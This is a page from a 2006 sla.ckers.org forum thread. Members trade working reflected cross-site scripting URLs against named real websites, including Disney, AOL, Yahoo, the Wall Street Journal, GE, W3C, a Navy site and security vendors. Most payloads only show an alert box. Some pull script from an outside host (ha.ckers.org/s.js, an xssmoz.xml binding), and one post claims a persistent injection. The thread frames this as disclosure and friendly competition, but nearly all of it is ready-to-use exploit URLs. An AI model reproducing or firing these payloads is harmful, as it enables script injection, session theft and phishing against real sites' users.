Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213...LastNext
Current Page: 8 of 65
Re: So it begins
Posted by: digi7al64
Date: September 26, 2006 09:39PM

http://search.disney.go.com/exec/?dym=1;i=1;land=1;m=1;oq=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E;x=19;y=8;r=1

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 26, 2006 09:43PM

http://playboy.rgc2.com/servlet/campaignrespondent?email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&emailButton=Yes%21&_ID_=pla.2264&Campaign_=NewProfileEntryPointCmpgn_SiteWideCollection&SIGNUP_ORIGIN=Passive_header_sitenav&SIGNUP_URL=

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 26, 2006 10:04PM

http://www.portblogs.com/blogpublisher/app/ext/sendthis.aspx?p={FBC2E0F6-C969-498C-BC24-B1AE8C9E63A3}&u=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 26, 2006 10:11PM

Boldy go where no nerd has gone before: http://www.startrek.com/startrek/view/search/result.html?type=article&search=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&category=

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 26, 2006 10:19PM

http://weather.aol.com/search.adp?search=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 26, 2006 10:20PM

hrm, in the shop subdomain: https://shop.starwars.com/myaccount/forgotten_password.html?retrieve=1&goback=&email=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&LoginBtn.x=77&LoginBtn.y=11&LoginBtn=Submit

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 26, 2006 10:59PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.gm.com/Scripts/SearchServer.exe&query=%22%3E%3Cscript%3Ealert('!');%3C/script%3E&method=mainQuery&Submit=Submit << gm.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 01:07AM

http://validator.opml.org/?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%22

encode those brackets rsnake .-.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 01:16AM

http://www.w3.org/2001/10/glance/view/?feed=%22%3E%3C/a%3E%3C/h3%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22Tried%20to%20keep%20it%20W3C%20compliant.%22);%3C/script%3E%3Ch3%3E%3Ca%20href=%22http://www.w3.org
http://www.w3.org/2001/10/glance/view/?since=%22+%2F%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cbr+a%3D%22
http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query=&index-grp=Public__FULL&index-type=t&type-index=XSS+Here%22%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cbr+a%3D%22

-maluc



Edited 2 time(s). Last edit at 09/27/2006 01:31AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 27, 2006 01:34AM

Ouch.

http://order.sbs.yahoo.com/ds/DomainSearchResults?.p=YD1&m=dom&.src=sbs&.promo=BESTDEAL&d=%22%3E%3C/a%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 01:55AM

http://viewer.youtubech.com/?q=%22><script>alert(%22XSS%22)</script><b%20=%22 thats youtubech, not youtube
http://rss.scripting.com/?url=http%3A%2F%2Fgoogle.com%2F%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cb%20a=%22 needs a valid domain first.. then /<script>blah
http://megalodon.jp/?url=http%3A%2F%2F%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc



Edited 1 time(s). Last edit at 09/27/2006 02:25AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 27, 2006 02:28AM

damn maluc - everytime i try to one up you, you always come back with something bigger...

Also i have noticed we have successfully hit the 4 of the 5 major search engines as well as a relatively large number of the top 100 websites going around (apparently all we needed to do was look).

congratulations to all.

http://www.latimes.com/search/dispatcher.front?target=blendedsearch&Query=%22%3B%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%22%3E%3C/iframe%3E%3Cscript%3Ealert('BUY%20STOCK%20IN%20digi7al64')%3C/script%3E&x=0&y=0 << Wall Street Journal

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 02:46AM

lol, i try to keep you on your toes ^^.

http://www.navair.navy.mil/pke_popup.cfm?app=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

news sites don't seem to budget much in the way of web application auditing, which is sad - they have alot to lose from humiliating XSS exploiting.. and good job with yahoo by the way, search engines are often a pain .. google in particular

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 27, 2006 03:24AM

"Congratulations, your domain name is available! quotalert39xss39.com"


SWEET, I always wanted quotalert39xss39.com!

-id

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 03:31AM

lol, that probably won't run without the semi-colon though :/

http://www.caltex.com/corp/en/Search.asp?qSearchText=Where%20Could%20It%20Be%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20a=%22 i guess these are the texaco's for non-texans? never seen one

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 27, 2006 03:43AM

id Wrote:
-------------------------------------------------------
> "Congratulations, your domain name is available!
> quotalert39xss39.com"
>
>
> SWEET, I always wanted quotalert39xss39.com!

Too late. :P

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 03:49AM

http://www.ge.com/jsp/search/newSearch.jsp?spell=true&lemmatize=true&properName=true&offset=0&curGroup=0&filter=&type=any&textToSearch=No+Breakout+Needed%252E+++++%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E&withinQuery=No+Breakout+Needed%252E+++++%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E&keywords=&similarType=&breadcrumb=&withinQuery_2=No+Breakout+Needed.+++++%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 04:06AM

PCI Compliance by 'authorized' security consultants, is just another money milking scam from the merchants =.= .. hopefully these guys don't charge much, as they probably don't do much: https://www.securitymetrics.com/eval_scan.adp?action=next&mc=1&email=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22&webserver=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 04:16AM

even a persistant one: https://www.securitymetrics.com/results_home.adp?email=asdfe%40yahoo%2ecom&hash=4408ccdc7930&login=true&sat=

may not work after a while if the hash is temporary.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 27, 2006 04:19AM

Sweet. Who is this "Xssman"? Lol

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 04:29AM

Just you friendly vigilante of stallownage ^^

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 05:11AM

http://weather.aol.com/search.adp?search=XSS%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb=%22 a second injection place
http://music.aol.com/search/artistresults.adp?query=asdf%22;alert(%22XSS%22);t=%22 javascript injection, no filters
http://music.aol.com/search/artistresults.adp?query=No%20Breakout%20Needed.<script>alert(%22XSS%22)</script> plaintext injection, no filters
http://movies.aol.com/search/dvdresults.adp?query=asdf%22;alert(%22XSS%22);t=%22 same javascript injection, no filters
http://movies.aol.com/search/movieanddvdresults.adp?query=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cb%20x%3D%22 input tags, but also seriously broke the page :/
http://movies.aol.com/search/dvdresults.adp?query=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E same plaintext injection
http://aol.careerbuilder.com/PLI/QuickSrchV2.asp?CatalystID=JS_AOL_MainQSBox&SiteID=cbaol003&lr=cbaol&QSCTY=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&QSSTS=ALL,US&QSKWD=&QSJBT=All&QSJBT=All&QSJBT=All same plaintext
http://videogames.aol.com/results.adp?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E same plaintext

I'm tired of copy pasting them, but you get the idea..

-maluc



Edited 1 time(s). Last edit at 09/27/2006 05:25AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 27, 2006 10:19AM

Whoah... nice ones guys... I got to bed for a few hours and you guys up your game considerably!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 27, 2006 12:35PM

WTF you sleeping for? GBTW!

-id

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 27, 2006 12:48PM

I want to know how Kelly Higgins (DarkReading) got my e-mail.
Am I on some sort of hacker mailing list now?

Anyways, I replied, elaborating that the F5 vulnerability was just html injection
and that as far as I remember, the Acunetix vulnerability DID work. (They seem to have fixed and denied it).

As well as include a new list of sites that we have added to our big list.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 01:06PM

per http://sla.ckers.org/forum/profile.php?3,63 :

User Profile : Kyran
Email: YourEmailHere
Posts: 87
Date Registered: 09/15/2006 12:29PM
Last Activity: 09/26/2006 04:31PM

you can set your email to hidden if you wish.

Edit: oh lol, i suppose you won't be able to hide it either way, if i post it here. censored.

-maluc



Edited 1 time(s). Last edit at 09/27/2006 01:08PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 27, 2006 01:09PM

http://www.darkreading.com/document.asp?doc_id=104739&WT.svl=news2_1

And it is my understanding there is another follow-up coming.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 27, 2006 01:42PM

I had a reasonably long email conversation with her too. So far she's not really used any of the stats I gave her. Oh well...

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 02:44PM

well reporters are reporters .. they'll write what makes for an interesting read and keeps their bosses off their back.

http://www.lightreading.com/search.asp?simple_search=yes&search_value=XSS+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search_timespan=past_year

-maluc



Edited 1 time(s). Last edit at 09/27/2006 03:00PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 27, 2006 03:00PM

And for the Acunetix troupe who check their website 'on a daily basis to ensure no such vulnerabilities exist' .. http://support.acunetix.com/index.php?form_submit=forgot_email&mod_id=6&forgot_email=XSS+is+here.%5C%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E

stallone haters, use the plain one: http://support.acunetix.com/index.php?form_submit=forgot_code&mod_id=6&forgot_email=XSS+is+here.%22%3E%3Cscript%3Ea%3DString.fromCharCode%2883%29%3Balert%28String.fromCharCode%2888%29%2Ba%2Ba%29%3C%2Fscript%3E%3Cx+x%3D&forgot_code=XSS+here+too.%22%3E%3Cscript%3Ea%3DString.fromCharCode%2883%29%3Balert%28String.fromCharCode%2888%29%2Ba%2Ba%2B2%29%3C%2Fscript%3E%3Cx+x%3D&forgot_password=asdf&verify_password=asdf

-maluc

Options: ReplyQuote
Pages: PreviousFirst...345678910111213...LastNext
Current Page: 8 of 65


Sorry, only registered users may post in this forum.